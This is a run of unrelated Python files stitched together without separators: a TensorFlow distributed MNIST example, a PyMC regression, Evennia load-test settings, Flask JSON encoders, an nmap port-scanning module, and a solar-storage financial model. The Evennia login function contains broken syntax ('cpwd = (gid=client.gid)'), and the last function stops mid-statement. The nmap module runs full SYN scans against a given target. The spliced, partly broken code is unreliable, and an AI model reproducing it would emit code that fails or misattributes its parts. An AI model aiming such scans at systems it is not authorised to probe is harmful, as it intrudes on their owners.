class BillListSchema(ma.ModelSchema): class Meta: model = Bill bill_list_schema = BillListSchema(many=True) scotthuang1989/mytensorflow_example_code # Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== from __future__ import print_function import math import os import tensorflow as tf from tensorflow.examples.tutorials.mnist import mnist flags = tf.app.flags # Flags for configuring the task flags.DEFINE_string("job_name", None, "job name: worker or ps") flags.DEFINE_integer("task_index", 0, "Worker task index, should be >= 0. task_index=0 is " "the chief worker task the performs the variable " "initialization") flags.DEFINE_string("ps_hosts", "", "Comma-separated list of hostname:port pairs") flags.DEFINE_string("worker_hosts", "", "Comma-separated list of hostname:port pairs") # Training related flags flags.DEFINE_string("data_dir", None, "Directory where the mnist data is stored") flags.DEFINE_string("train_dir", None, "Directory for storing the checkpoints") flags.DEFINE_integer("hidden1", 128, "Number of units in the 1st hidden layer of the NN") flags.DEFINE_integer("hidden2", 128, "Number of units in the 2nd hidden layer of the NN") flags.DEFINE_integer("batch_size", 100, "Training batch size") flags.DEFINE_float("learning_rate", 0.01, "Learning rate") FLAGS = flags.FLAGS TRAIN_FILE = "train.tfrecords" def read_and_decode(filename_queue): reader = tf.TFRecordReader() _, serialized_example = reader.read(filename_queue) features = tf.parse_single_example( serialized_example, # Defaults are not specified since both keys are required. features={ 'image_raw': tf.FixedLenFeature([], tf.string), 'label': tf.FixedLenFeature([], tf.int64), }) # Convert from a scalar string tensor (whose single string has # length mnist.IMAGE_PIXELS) to a uint8 tensor with shape # [mnist.IMAGE_PIXELS]. image = tf.decode_raw(features['image_raw'], tf.uint8) image.set_shape([mnist.IMAGE_PIXELS]) # OPTIONAL: Could reshape into a 28x28 image and apply distortions # here. Since we are not applying any distortions in this # example, and the next step expects the image to be flattened # into a vector, we don't bother. # Convert from [0, 255] -> [-0.5, 0.5] floats. image = tf.cast(image, tf.float32) * (1. / 255) - 0.5 # Convert label from a scalar uint8 tensor to an int32 scalar. label = tf.cast(features['label'], tf.int32) return image, label def inputs(batch_size): """Reads input data. Args: batch_size: Number of examples per returned batch. Returns: A tuple (images, labels), where: * images is a float tensor with shape [batch_size, mnist.IMAGE_PIXELS] in the range [-0.5, 0.5]. * labels is an int32 tensor with shape [batch_size] with the true label, a number in the range [0, mnist.NUM_CLASSES). """ filename = os.path.join(FLAGS.data_dir, TRAIN_FILE) with tf.name_scope('input'): filename_queue = tf.train.string_input_producer([filename]) # Even when reading in multiple threads, share the filename # queue. image, label = read_and_decode(filename_queue) # Shuffle the examples and collect them into batch_size batches. # (Internally uses a RandomShuffleQueue.) # We run this in two threads to avoid being a bottleneck. images, sparse_labels = tf.train.shuffle_batch( [image, label], batch_size=batch_size, num_threads=2, capacity=1000 + 3 * batch_size, # Ensures a minimum amount of shuffling of examples. min_after_dequeue=1000) return images, sparse_labels def device_and_target(): # If FLAGS.job_name is not set, we're running single-machine TensorFlow. # Don't set a device. if FLAGS.job_name is None: print("Running single-machine training") return (None, "") # Otherwise we're running distributed TensorFlow. print("Running distributed training") if FLAGS.task_index is None or FLAGS.task_index == "": raise ValueError("Must specify an explicit `task_index`") if FLAGS.ps_hosts is None or FLAGS.ps_hosts == "": raise ValueError("Must specify an explicit `ps_hosts`") if FLAGS.worker_hosts is None or FLAGS.worker_hosts == "": raise ValueError("Must specify an explicit `worker_hosts`") cluster_spec = tf.train.ClusterSpec({ "ps": FLAGS.ps_hosts.split(","), "worker": FLAGS.worker_hosts.split(","), }) print(cluster_spec) server = tf.train.Server( cluster_spec, job_name=FLAGS.job_name, task_index=FLAGS.task_index) if FLAGS.job_name == "ps": server.join() worker_device = "/job:worker/task:{}".format(FLAGS.task_index) # The device setter will automatically place Variables ops on separate # parameter servers (ps). The non-Variable ops will be placed on the workers. return ( tf.train.replica_device_setter( worker_device=worker_device, cluster=cluster_spec), server.target, ) def main(unused_argv): if FLAGS.data_dir is None or FLAGS.data_dir == "": raise ValueError("Must specify an explicit `data_dir`") if FLAGS.train_dir is None or FLAGS.train_dir == "": raise ValueError("Must specify an explicit `train_dir`") device, target = device_and_target() with tf.device(device): images, labels = inputs(FLAGS.batch_size) logits = mnist.inference(images, FLAGS.hidden1, FLAGS.hidden2) loss = mnist.loss(logits, labels) train_op = mnist.training(loss, FLAGS.learning_rate) # scott hooks=[tf.train.StopAtStepHook(last_step=100000)] mystep=0 with tf.train.MonitoredTrainingSession( master=target, is_chief=(FLAGS.task_index == 0), checkpoint_dir=FLAGS.train_dir,hooks=hooks) as sess: while not sess.should_stop(): mystep +=1 sess.run(train_op) with open(os.path.join(FLAGS.train_dir,"mystep.txt"),'a') as fd: fd.write(str(mystep) + "\n") if __name__ == "__main__": tf.app.run() """ Straight line fit -- linear regression ====================================== This is probably the most widespread problems in statistics: estimating the slope and ordinate of a linear relationship y = ax+b given some data (x,y). The standard least-square (SLS) solution to this problem assumes that the input data x is exact, and that errors only affect output measurements y. In many instances, this assumption does not hold and using the same SLS method yields biased parameters: the slope is underestimated and the ordinate overestimated. Here, both input and output data are assumed to be corrupted by errors of zero mean and variances of sigma_x and sigma_y respectively. Under these assumptions, the most general statistical distribution (maximum entropy) is the normal distribution. In the following, the parameter distribution is sampled by marginalizing x from .. math:: p(a,b,x \mid \tilde{x}, \tilde{y}) = p(\tilde{y} \mid a, b, x) p(\tilde{x} \mid x) p(x) p(a,b), where p(x) stands for the prior for the true input and p(a,b) the prior for the regression parameters. """ from pymc import stochastic, observed, deterministic, uniform_like, runiform, rnormal, Sampler, Normal, Uniform from numpy import inf, log, cos,array import pylab # ------------------------------------------------------------------------------ # Synthetic values # Replace by real data # ------------------------------------------------------------------------------ slope = 1.5 intercept = 4 N = 30 true_x = runiform(0,50, N) true_y = slope*true_x + intercept data_y = rnormal(true_y, 2) data_x = rnormal(true_x, 2) # ------------------------------------------------------------------------------ # Calibration of straight line parameters from data # ------------------------------------------------------------------------------ @stochastic def theta(value=array([2.,5.])): """Slope and intercept parameters for a straight line. The likelihood corresponds to the prior probability of the parameters.""" slope, intercept = value prob_intercept = uniform_like(intercept, -10, 10) prob_slope = log(1./cos(slope)**2) return prob_intercept+prob_slope init_x = data_x.clip(min=0, max=50) # Inferred true inputs. x = Uniform('x', lower=0, upper=50, value=init_x) @deterministic def modelled_y(x=x, theta=theta): """Return y computed from the straight line model, given the inferred true inputs and the model paramters.""" slope, intercept = theta return slope*x + intercept """ Input error model. Define the probability of measuring x knowing the true value. """ measured_input = Normal('measured_input', mu=x, tau=2, value=data_x, observed=True) """ Output error model. Define the probability of measuring x knowing the true value. In this case, the true value is assumed to be given by the model, but structural errors could be integrated to the analysis as well. """ y = Normal('y', mu=modelled_y, tau=2, value=data_y, observed=True) lootcrawl/evennia0 """ Settings and actions for the dummyrunner This module defines dummyrunner settings and sets up the actions available to dummy accounts. The settings are global variables: - TIMESTEP - time in seconds between each 'tick'. 1 is a good start. - CHANCE_OF_ACTION - chance 0-1 of action happening. Default is 0.5. - CHANCE_OF_LOGIN - chance 0-1 of login happening. 0.01 is a good number. - TELNET_PORT - port to use, defaults to settings.TELNET_PORT - ACTIONS - see below ACTIONS is a tuple ```python (login_func, logout_func, (0.3, func1), (0.1, func2) ... ) ``` where the first entry is the function to call on first connect, with a chance of occurring given by CHANCE_OF_LOGIN. This function is usually responsible for logging in the account. The second entry is always called when the dummyrunner disconnects from the server and should thus issue a logout command. The other entries are tuples (chance, func). They are picked randomly, their commonality based on the cumulative chance given (the chance is normalized between all options so if will still work also if the given chances don't add up to 1). The PROFILE variable define pre-made ACTION tuples for convenience. Each function should return an iterable of one or more command-call strings (like "look here"), so each can group multiple command operations. An action-function is called with a "client" argument which is a reference to the dummy client currently performing the action. The client object has the following relevant properties and methods: - key - an optional client key. This is only used for dummyrunner output. Default is "Dummy-" - cid - client id - gid - globally unique id, hashed with time stamp - istep - the current step - exits - an empty list. Can be used to store exit names - objs - an empty list. Can be used to store object names - counter() - returns a unique increasing id, hashed with time stamp to make it unique also between dummyrunner instances. The return should either be a single command string or a tuple of command strings. This list of commands will always be executed every TIMESTEP with a chance given by CHANCE_OF_ACTION by in the order given (no randomness) and allows for setting up a more complex chain of commands (such as creating an account and logging in). ---- """ import random import string # Dummy runner settings # Time between each dummyrunner "tick", in seconds. Each dummy # will be called with this frequency. TIMESTEP = 1 # TIMESTEP = 0.025 # 40/s # Chance of a dummy actually performing an action on a given tick. # This spreads out usage randomly, like it would be in reality. CHANCE_OF_ACTION = 0.5 # Chance of a currently unlogged-in dummy performing its login # action every tick. This emulates not all accounts logging in # at exactly the same time. CHANCE_OF_LOGIN = 0.01 # Which telnet port to connect to. If set to None, uses the first # default telnet port of the running server. TELNET_PORT = None # Setup actions tuple # some convenient templates DUMMY_NAME = "Dummy_{gid}" DUMMY_PWD = (''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20)) + "-{gid}") START_ROOM = "testing_room_start_{gid}" ROOM_TEMPLATE = "testing_room_%s" EXIT_TEMPLATE = "exit_%s" OBJ_TEMPLATE = "testing_obj_%s" TOBJ_TEMPLATE = "testing_button_%s" TOBJ_TYPECLASS = "contrib.tutorial_examples.red_button.RedButton" # action function definitions (pick and choose from # these to build a client "usage profile" # login/logout def c_login(client): "logins to the game" # we always use a new client name cname = DUMMY_NAME.format(gid=client.gid) cpwd = DUMMY_PWD.format(gid=client.gid) room_name = START_ROOM.format(gid=client.gid) # we assign the dummyrunner cmdsert to ourselves so # we can use special commands add_cmdset = ( "py from evennia.server.profiling.dummyrunner import DummyRunnerCmdSet;" "self.cmdset.add(DummyRunnerCmdSet, persistent=False)" ) # create character, log in, then immediately dig a new location and # teleport it (to keep the login room clean) cmds = ( f"create {cname} {cpwd}", f"yes", # to confirm creation f"connect {cname} {cpwd}", f"dig {room_name}", f"teleport {room_name}", add_cmdset, ) return cmds def c_login_nodig(client): "logins, don't dig its own room" cname = DUMMY_NAME.format(gid=client.gid) cpwd = (gid=client.gid) cmds = ( f"create {cname} {cpwd}", f"connect {cname} {cpwd}" ) return cmds def c_logout(client): "logouts of the game" return ("quit",) # random commands def c_looks(client): "looks at various objects" cmds = ["look %s" % obj for obj in client.objs] if not cmds: cmds = ["look %s" % exi for exi in client.exits] if not cmds: cmds = ("look",) return cmds def c_examines(client): "examines various objects" cmds = ["examine %s" % obj for obj in client.objs] if not cmds: cmds = ["examine %s" % exi for exi in client.exits] if not cmds: cmds = ("examine me",) return cmds def c_idles(client): "idles" cmds = ("idle", "idle") return cmds def c_help(client): "reads help files" cmds = ("help", "dummyrunner_echo_response",) return cmds def c_digs(client): "digs a new room, storing exit names on client" roomname = ROOM_TEMPLATE % client.counter() exitname1 = EXIT_TEMPLATE % client.counter() exitname2 = EXIT_TEMPLATE % client.counter() client.exits.extend([exitname1, exitname2]) return ("dig/tel %s = %s, %s" % (roomname, exitname1, exitname2),) def c_creates_obj(client): "creates normal objects, storing their name on client" objname = OBJ_TEMPLATE % client.counter() client.objs.append(objname) cmds = ( "create %s" % objname, 'desc %s = "this is a test object' % objname, "set %s/testattr = this is a test attribute value." % objname, "set %s/testattr2 = this is a second test attribute." % objname, ) return cmds def c_creates_button(client): "creates example button, storing name on client" objname = TOBJ_TEMPLATE % client.counter() client.objs.append(objname) cmds = ("create %s:%s" % (objname, TOBJ_TYPECLASS), "desc %s = test red button!" % objname) return cmds def c_socialize(client): "socializechats on channel" cmds = ( "pub Hello!", "say Yo!", "emote stands looking around.", ) return cmds def c_moves(client): "moves to a previously created room, using the stored exits" cmds = client.exits # try all exits - finally one will work return ("look",) if not cmds else cmds def c_moves_n(client): "move through north exit if available" return ("north",) def c_moves_s(client): "move through south exit if available" return ("south",) def c_measure_lag(client): """ Special dummyrunner command, injected in c_login. It measures response time. Including this in the ACTION tuple will give more dummyrunner output about just how fast commands are being processed. The dummyrunner will treat this special and inject the {timestamp} just before sending. """ return ("dummyrunner_echo_response {timestamp}",) # Action profile (required) # Some pre-made profiles to test. To make your own, just assign a tuple to ACTIONS. # # idler - does nothing after logging in # looker - just looks around # normal_player - moves around, reads help, looks around (digs rarely) (spammy) # normal_builder - digs now and then, examines, creates objects, moves # heavy_builder - digs and creates a lot, moves and examines # socializing_builder - builds a lot, creates help entries, moves, chat (spammy) # only_digger - extreme builder that only digs room after room PROFILE = "looker" if PROFILE == 'idler': ACTIONS = ( c_login, c_logout, (0.9, c_idles), (0.1, c_measure_lag), ) elif PROFILE == 'looker': ACTIONS = ( c_login, c_logout, (0.8, c_looks), (0.2, c_measure_lag) ) elif PROFILE == 'normal_player': ACTIONS = ( c_login, c_logout, (0.01, c_digs), (0.29, c_looks), (0.2, c_help), (0.3, c_moves), (0.05, c_socialize), (0.1, c_measure_lag) ) elif PROFILE == 'normal_builder': ACTIONS = ( c_login, c_logout, (0.5, c_looks), (0.08, c_examines), (0.1, c_help), (0.01, c_digs), (0.01, c_creates_obj), (0.2, c_moves), (0.1, c_measure_lag) ) elif PROFILE == 'heavy_builder': ACTIONS = ( c_login, c_logout, (0.1, c_looks), (0.1, c_examines), (0.2, c_help), (0.1, c_digs), (0.1, c_creates_obj), (0.2, c_moves), (0.1, c_measure_lag) ) elif PROFILE == 'socializing_builder': ACTIONS = ( c_login, c_logout, (0.1, c_socialize), (0.1, c_looks), (0.1, c_help), (0.1, c_creates_obj), (0.2, c_digs), (0.3, c_moves), (0.1, c_measure_lag) ) elif PROFILE == 'only_digger': ACTIONS = ( c_login, c_logout, (0.9, c_digs), (0.1, c_measure_lag) ) else: print("No dummyrunner ACTION profile defined.") import sys sys.exit() from __future__ import absolute_import from flask import request from flask.json import JSONEncoder import six from decimal import Decimal from .util import PrettyDecimal if six.PY3: unicode = str class IterableEncoder(JSONEncoder): def default(self, o): try: iterator = iter(o) except TypeError: pass else: return list(o) return super(IterableEncoder, self).default(o) class PrivateJsonEncoder(JSONEncoder): def default(self, o): if hasattr(o, '_json'): try: extended = request.json_extended except AttributeError: extended = request.args.get('extended', False) # request.json_extended can be a dict to set extended mode for only # certain types of objects if isinstance(extended, dict): scope_class = object scope_extended = False for cls, ext in six.iteritems(extended): if isinstance(o, cls) and issubclass(type(o), scope_class): scope_extended = ext scope_class = cls extended = scope_extended return o._json(extended) return super(PrivateJsonEncoder, self).default(o) class DecimalEncoder(JSONEncoder): def default(self, o): if isinstance(o, PrettyDecimal): return o.currency() elif isinstance(o, Decimal): return unicode(o) return super(DecimalEncoder, self).default(o) # Multiple inheritance FTW class SRPEncoder(PrivateJsonEncoder, IterableEncoder, DecimalEncoder): pass #!/usr/bin/env python3 # -*- coding: utf-8 -*- from core.constants import EXTERNAL, IG from core.regressiontest import RegressionTest from core.module import Module import xmltodict import json import os class NmapModule(Module): _type = [IG] _services = [] _target_type = EXTERNAL _defaults = {} _extension = ".xml" def run(self): command = [ "sudo", "nmap", "-sS", "-p-", "-oX", (self._tmpfile_loc()), ] self.run_cmd(" ".join(command + [self._target])) def parse(self): # Get current dir and check that path exists, else create path. target_loc = f"{os.getcwd()}/targets/{self._target}/results" # Open xml scan and convert to json if os.path.exists(f"{target_loc}/{self._res_name}.xml"): with open(f"{target_loc}/{self._res_name}.xml", "r") as f: xml = json.dumps(xmltodict.parse(f.read()), indent=4) # Overwrite scan results json with open(f"{target_loc}/{self._res_name}.json", "w+") as f: f.write(xml) def init(self): pass """ Define regression tests here """ class NmapPortRegression(RegressionTest): _extension = ".xml" # Specifies what extension the result file has _description = "Checks if a given set of Nmap ports are still open" _defaults = { } def run(self): command = [ "sudo", "nmap", "-sS", "-p", ",".join(self._payload["ports"]), "-oX", (self._tmpfile_loc()), ] self.run_cmd(" ".join(command + [self._target])) def parse(self): # Get current dir and check that path exists, else create path. target_loc = f"{os.getcwd()}/targets/{self._target}/regtests" # Open xml scan and convert to json if os.path.exists(f"{target_loc}/{self._res_name}.xml"): data = {} with open(f"{target_loc}/{self._res_name}.xml", "r") as f: data = xmltodict.parse(f.read()) result = {port: "closed" for port in self._payload["ports"]} # Make into list if type(data["nmaprun"]["host"]["ports"]["port"]) is not list: data["nmaprun"]["host"]["ports"]["port"] = [data["nmaprun"]["host"]["ports"]["port"]] for port in data["nmaprun"]["host"]["ports"]["port"]: if ( port["state"]["@state"] == "open" ): result[port["@portid"]] = "open" # Overwrite scan results json with open(f"{target_loc}/{self._res_name}.json", "w+") as f: f.write(json.dumps(result, indent=4)) def check(target): ports = [] # Specifies which ports that are of interest (Leave empty if all) open_ports = [] # Check nmap file for open ports with open( f"{os.getcwd()}/targets/{target}/results/nmap_result.json", "r" ) as f: data = json.load(f) # Make into list if type(data["nmaprun"]["host"]["ports"]["port"]) is not list: data["nmaprun"]["host"]["ports"]["port"] = [data["nmaprun"]["host"]["ports"]["port"]] # Check all ports if not ports: for port in data["nmaprun"]["host"]["ports"]["port"]: if port["state"]["@state"] == "open": open_ports.append( port["@portid"] ) # add ports with specific services else: for port in data["nmaprun"]["host"]["ports"]["port"]: if ( port["@portid"] in ports and port["state"]["@state"] == "open" ): open_ports.append(port["@portid"]) # Return None if empty if len(open_ports) == 0: return None return {"ports": open_ports} # -*- coding: utf-8 -*- import numpy as np import pandas as pd import utility_functions as utilfunc import sys import config # Import from support function repo import dispatch_functions as dFuncs import tariff_functions as tFuncs import decorators np.seterr(divide='ignore', invalid='ignore') #============================================================================== # Load logger logger = utilfunc.get_logger() #============================================================================== #%% def calc_system_size_and_financial_performance(agent): """ This function accepts the characteristics of a single agent and evaluates the financial performance of a set of solar+storage system sizes. The system size with the highest NPV is selected. Parameters ---------- agent : pandas.Series Single agent (row) from an agent dataframe. Returns ------- pandas.Series Agent with system size, business model and corresponding financial performance. """ #=========================================================================# # Setup #=========================================================================# try: in_cols = list(agent.index) if config.VERBOSE: logger.info(' ') logger.info("\tRunning system size calculations for: {}, {}, {}".format(agent['state'], agent['tariff_class'], agent['sector_abbr'])) logger.info('real_discount: {}'.format(agent['discount_rate'])) logger.info('loan_rate: {}'.format(agent['loan_rate'])) logger.info('down_payment: {}'.format(agent['down_payment'])) # Set resolution of dispatcher d_inc_n_est = 10 DP_inc_est = 12 d_inc_n_acc = 20 DP_inc_acc = 12 # Extract load profile load_profile = np.array(agent['consumption_hourly']) agent.loc['timesteps_per_year'] = 1 # Extract load profile pv_cf_profile = np.array(agent['solar_cf_profile']) / 1e3 agent['naep'] = float(np.sum(pv_cf_profile)) # Create battery object batt = dFuncs.Battery() batt_ratio = 3.0 tariff = tFuncs.Tariff(dict_obj=agent.loc['tariff_dict']) # Create export tariff object if agent['nem_system_size_limit_kw'] != 0: export_tariff = tFuncs.Export_Tariff(full_retail_nem=True) export_tariff.periods_8760 = tariff.e_tou_8760 export_tariff.prices = tariff.e_prices_no_tier else: export_tariff = tFuncs.Export_Tariff(full_retail_nem=False) original_bill, original_results = tFuncs.bill_calculator(load_profile, tariff, export_tariff) if config.VERBOSE: logger.info('original_bill: {}'.format(original_bill)) agent['first_year_elec_bill_without_system'] = original_bill * agent['elec_price_multiplier'] if config.VERBOSE: logger.info('multiplied original bill: {}'.format(agent['first_year_elec_bill_without_system'])) if agent['first_year_elec_bill_without_system'] == 0: agent['first_year_elec_bill_without_system']=1.0 agent['first_year_elec_cents_per_kwh_without_system'] = agent['first_year_elec_bill_without_system'] / agent['load_per_customer_in_bin_kwh'] #=========================================================================# # Estimate bill savings revenue from a set of solar+storage system sizes #=========================================================================# max_size_load = agent.loc['load_per_customer_in_bin_kwh']/agent.loc['naep'] max_size_roof = agent.loc['developable_roof_sqft'] * agent.loc['developable_buildings_pct'] * agent.loc['pv_power_density_w_per_sqft']/1000.0 agent.loc['max_pv_size'] = min([max_size_load, max_size_roof, agent.loc['nem_system_size_limit_kw']]) if config.VERBOSE: logger.info('max_size_load: {}'.format(max_size_load)) logger.info('max_size_roof: {}'.format(max_size_roof)) dynamic_sizing = True #False if dynamic_sizing: pv_sizes = np.arange(0, 1.1, 0.1) * agent.loc['max_pv_size'] else: # Size the PV system depending on NEM availability, either to 95% of load w/NEM, or 50% w/o NEM. In both cases, roof size is a constraint. if export_tariff.full_retail_nem==True: pv_sizes = np.array([min(max_size_load * 0.95, max_size_roof)]) else: pv_sizes = np.array([min(max_size_load * 0.5, max_size_roof)]) batt_powers = np.zeros(1) # Calculate the estimation parameters for each PV size est_params_df = pd.DataFrame(index=pv_sizes) est_params_df['estimator_params'] = 'temp' for pv_size in pv_sizes: load_and_pv_profile = load_profile - pv_size*pv_cf_profile est_params_df.at[pv_size, 'estimator_params'] = dFuncs.calc_estimator_params(load_and_pv_profile, tariff, export_tariff, batt.eta_charge, batt.eta_discharge) # Create df with all combinations of solar+storage sizes system_df = pd.DataFrame(dFuncs.cartesian([pv_sizes, batt_powers]), columns=['pv', 'batt_kw']) system_df['est_bills'] = None pv_kwh_by_year = np.array([sum(x) for x in np.split(np.array(pv_cf_profile), agent.loc['timesteps_per_year'])]) pv_kwh_by_year = np.concatenate([(pv_kwh_by_year - ( pv_kwh_by_year * agent.loc['pv_deg'] * i)) for i in range(1, agent.loc['economic_lifetime']+1)]) system_df['kwh_by_timestep'] = system_df['pv'].apply(lambda x: x * pv_kwh_by_year) n_sys = len(system_df) for i in system_df.index: pv_size = system_df['pv'][i].copy() load_and_pv_profile = load_profile - pv_size*pv_cf_profile # for buy all sell all agents: calculate value of generation based on wholesale prices and subtract from original bill if agent.loc['compensation_style'] == 'Buy All Sell All': sell_all = np.sum(pv_size * pv_cf_profile * agent.loc['wholesale_elec_use_per_kwh']) system_df.loc[i, 'est_bills'] = original_bill - sell_all # for net billing agents: if system size within policy limits, set sell rate to wholesale price -- otherwise, set sell rate to 0 elif (agent.loc['compensation_style'] == 'Net Billing (Wholesale)') or (agent.loc['compensation_style'] == 'Net Billing (Avoided Cost)'): export_tariff = tFuncs.Export_Tariff(full_retail_nem=False) if pv_size<=agent.loc['nem_system_size_limit_kw']: if agent.loc['compensation_style'] == 'Net Billing (Wholesale)': export_tariff.set_constant_sell_price(agent.loc['wholesale_elec_usd_per_kwh']) elif agent.loc['compensation_style'] == 'Net Billing (Avoided Cost)': export_tariff.set_constant_sell_price(agent.loc['hourly_excess_sell_rate_usd_per_kwh']) else: export_tariff.set_constant_sell_price(0.) batt_power = system_df['batt_kw'][i].copy() batt.set_cap_and_power(batt_power*batt_ratio, batt_power) if batt_power > 0: estimator_params = est_params_df.loc[system_df['pv'][i].copy(), 'estimator_params'] estimated_results = dFuncs.determine_optimal_dispatch(load_profile, pv_size*pv_cf_profile, batt, tariff, export_tariff, estimator_params=estimator_params, estimated=True, DP_inc=DP_inc_est, d_inc_n=d_inc_n_est, estimate_demand_levels=True) system_df.loc[i, 'est_bills'] = estimated_results['bill_under_dispatch'] else: bill_with_PV, _ = tFuncs.bill_calculator(load_and_pv_profile, tariff, export_tariff) system_df.loc[i, 'est_bills'] = bill_with_PV #+ one_time_charge # for net metering agents: if system size within policy limits, set full_retail_nem=True -- otherwise set export value to wholesale price elif agent.loc['compensation_style'] == 'Net Metering': if pv_size<=agent.loc['nem_system_size_limit_kw']: export_tariff = tFuncs.Export_Tariff(full_retail_nem=True) export_tariff.periods_8760 = tariff.e_tou_8760 export_tariff.prices = tariff.e_prices_no_tier else: export_tariff = tFuncs.Export_Tariff(full_retail_nem=False) export_tariff.set_constant_sell_price(agent.loc['wholesale_elec_usd_per_kwh']) batt_power = system_df['batt_kw'][i].copy() batt.set_cap_and_power(batt_power*batt_ratio, batt_power) if batt_power > 0: estimator_params = est_params_df.loc[system_df['pv'][i].copy(), 'estimator_params'] estimated_results = dFuncs.determine_optimal_dispatch(load_profile, pv_size*pv_cf_profile, batt, tariff, export_tariff, estimator_params=estimator_params, estimated=True, DP_inc=DP_inc_est, d_inc_n=d_inc_n_est, estimate_demand_levels=True) system_df.loc[i, 'est_bills'] = estimated_results['bill_under_dispatch'] else: bill_with_PV, _ = tFuncs.bill_calculator(load_and_pv_profile, tariff, export_tariff) system_df.loc[i, 'est_bills'] = bill_with_PV #+ one_time_charge # for agents with no compensation mechanism: set sell rate to 0 and calculate bill with net load profile else: export_tariff = tFuncs.Export_Tariff(full_retail_nem=False) export_tariff.set_constant_sell_price(0.) batt_power = system_df['batt_kw'][i].copy() batt.set_cap_and_power(batt_power*batt_ratio, batt_power) if batt_power > 0: estimator_params = est_params_df.loc[system_df['pv'][i].copy(), 'estimator_params'] estimated_results = dFuncs.determine_optimal_dispatch(load_profile, pv_size*pv_cf_profile, batt, tariff, export_tariff, estimator_params=estimator_params, estimated=True, DP_inc=DP_inc_est, d_inc_n=d_inc_n_est, estimate_demand_levels=True) system_df.loc[i, 'est_bills'] = estimated_results['bill_under_dispatch'] else: bill_with_PV, _ = tFuncs.bill_calculator(load_and_pv_profile, tariff, export_tariff) system_df.loc[i, 'est_bills'] = bill_with_PV #+ one_time_charge # Calculate bill savings cash flow # elec_price_multiplier is the scalar increase in the cost of electricity since 2016, when the tariffs were curated # elec_price_escalator is this agent's assumption about how the price of electricity will change in the future. avg_est_bill_savings = (original_bill - np.array(system_df['est_bills'])).reshape([n_sys, 1]) * agent['elec_price_multiplier'] est_bill_savings = np.zeros([n_sys, agent['economic_lifetime']+1]) est_bill_savings[:,1:] = avg_est_bill_savings escalator = (np.zeros(agent['economic_lifetime']+1) + agent['elec_price_escalator'] + 1)**list(range(agent['economic_lifetime']+1)) degradation = (np.zeros(agent['economic_lifetime']+1) + 1 - agent['pv_deg'])**list(range(agent['economic_lifetime']+1)) est_bill_savings = est_bill_savings * escalator * degradation system_df['est_bill_savings'] = est_bill_savings[:, 1] # simple representation of 70% minimum of batt charging from PV in order to # qualify for the ITC. Here, if batt kW is greater than 25% of PV kW, no ITC. batt_chg_frac = np.where(system_df['pv'] >= system_df['batt_kw']*4.0, 1.0, 0) #=========================================================================# # Determine financial performance of each system size #=========================================================================# if 'investment_incentive_pct' in agent.index: if agent['investment_incentive_year_cutoff'] >= agent['year']: investment_incentives = np.full(system_df.shape[0], agent['investment_incentive_pct']) else: investment_incentives = np.zeros(system_df.shape[0]) else: investment_incentives = np.zeros(system_df.shape[0]) if 'capacity_incentive' in agent.index: raise NotImplementedError else: capacity_based_incentives = np.zeros(system_df.shape[0]) if 'production_incentive' in agent.index: raise NotImplementedError else: production_based_incentives = np.tile(np.array([0]*agent.loc['economic_lifetime']), (system_df.shape[0],1)) if 'cash_incentives' in agent.index: raise NotImplementedError else: cash_incentives = np.array([0]*system_df.shape[0]) cf_results_est = cashflow_constructor(bill_savings=est_bill_savings, pv_size=np.array(system_df['pv']), pv_price=agent.loc['pv_price_per_kw'], pv_om=agent.loc['pv_om_per_kw'], batt_cap=np.array(system_df['batt_kw'])*batt_ratio, batt_power=np.array(system_df['batt_kw']), batt_cost_per_kw=agent.loc['batt_price_per_kw'], batt_cost_per_kwh=agent.loc['batt_price_per_kwh'], batt_om_per_kw=agent.loc['batt_om_per_kw'], batt_om_per_kwh=agent.loc['batt_om_per_kwh'], batt_chg_frac=batt_chg_frac, sector=agent.loc['sector_abbr'], itc=agent.loc['itc_fraction'], deprec_sched=agent.loc['deprec_sch'], fed_tax_rate=agent['tax_rate'], state_tax_rate=0, real_d=agent['discount_rate'], analysis_years=agent.loc['economic_lifetime'], inflation=agent.loc['inflation'], down_payment_fraction=agent.loc['down_payment'], loan_rate=agent.loc['loan_rate'], loan_term=agent.loc['loan_term'], cash_incentives=cash_incentives, ibi=investment_incentives, cbi=capacity_based_incentives, pbi=production_based_incentives) system_df['npv'] = cf_results_est['npv'] #=========================================================================# # Select system size and business model for this agent #=========================================================================# index_of_best_fin_perform_ho = system_df['npv'].idxmax() opt_pv_size = system_df['pv'][index_of_best_fin_perform_ho].copy() opt_batt_power = system_df['batt_kw'][index_of_best_fin_perform_ho].copy() opt_batt_cap = opt_batt_power*batt_ratio batt.set_cap_and_power(opt_batt_cap, opt_batt_power) tariff = tFuncs.Tariff(dict_obj=agent.loc['tariff_dict']) # for buy all sell all agents: calculate value of generation based on wholesale prices and subtract from original bill if agent.loc['compensation_style'] == 'Buy All Sell All': sell_all = np.sum(opt_pv_size * pv_cf_profile * agent.loc['wholesale_elec_usd_per_kwh']) opt_bill = original_bill - sell_all # package into "dummy" dispatch results dictionary accurate_results = {'bill_under_dispatch' : opt_bill, 'batt_dispatch_profile' : np.zeros(len(load_profile))} # for net billing agents: if system size within policy limits, set sell rate to wholesale price -- otherwise, set sell rate to 0 elif (agent.loc['compensation_style'] == 'Net Billing (Wholesale)') or (agent.loc['compensation_style'] == 'Net Billing (Avoided Cost)'): export_tariff = tFuncs.Export_Tariff(full_retail_nem=False) if opt_pv_size<=agent.loc['nem_system_size_limit_kw']: if agent.loc['compensation_style'] == 'Net Billing (Wholesale)': export_tariff.set_constant_sell_price(agent.loc['wholesale_elec_usd_per_kwh']) elif agent.loc['compensation_style'] == 'Net Billing (Avoided Cost)': export_tariff.set_constant_sell_price(agent.loc['hourly_excess_sell_rate_usd_per_kwh']) else: export_tariff.set_constant_sell_price(0.) accurate_results = dFuncs.determine_optimal_dispatch(load_profile, opt_pv_size*pv_cf_profile, batt, tariff, export_tariff, estimated=False, d_inc_n=d_inc_n_acc, DP_inc=DP_inc_acc) # for net metering agents: if system size within policy limits, set full_retail_nem=True -- otherwise set export value to wholesale price elif agent.loc['compensation_style'] == 'Net Metering': export_tariff = tFuncs.Export_Tariff(full_retail_nem=True) if opt_pv_size<=agent.loc['nem_system_size_limit_kw']: export_tariff = 